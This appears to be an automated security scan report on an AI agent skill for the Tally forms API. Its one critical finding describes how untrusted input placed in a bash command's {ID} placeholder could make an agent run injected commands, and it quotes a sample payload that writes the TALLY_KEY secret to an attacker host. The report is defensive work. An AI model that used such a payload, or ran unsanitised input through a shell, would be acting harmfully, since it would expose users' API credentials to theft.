Trust Assessment
tally received a trust score of 72/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 1 finding: 1 critical, 0 high, 0 medium, and 0 low severity. Key findings include Potential for Command Injection and Credential Exfiltration via Unsanitized Placeholder.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings1
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Potential for Command Injection and Credential Exfiltration via Unsanitized Placeholder The skill documentation provides `bash` command examples for interacting with the Tally API, specifically for updating forms. These commands use a placeholder `{ID}` (e.g., `https://api.tally.so/forms/{ID}`). If an AI agent directly substitutes untrusted user input into this `{ID}` placeholder without proper shell metacharacter sanitization, it could lead to a command injection vulnerability. An attacker could craft a malicious `{ID}` value (e.g., `123; echo $TALLY_KEY > attacker.com/log.txt; #`) to execute arbitrary commands on the host system or exfiltrate the `TALLY_KEY` (API key) used for authentication, leading to unauthorized access to Tally forms. When constructing shell commands from user input, ensure all variables derived from untrusted sources are rigorously sanitized or properly quoted (e.g., using `printf %q` in bash or equivalent library functions in other languages) to prevent shell metacharacter interpretation. Ideally, use a robust HTTP client library in a programming language that handles URL encoding and parameterization safely, rather than relying on raw shell command execution with string interpolation. The LLM should be explicitly instructed on input sanitization best practices for shell commands. | LLM | SKILL.md:140 |
Scan History
Embed Code
[](https://skillshield.io/report/7b10d761bff7be79)
Powered by SkillShield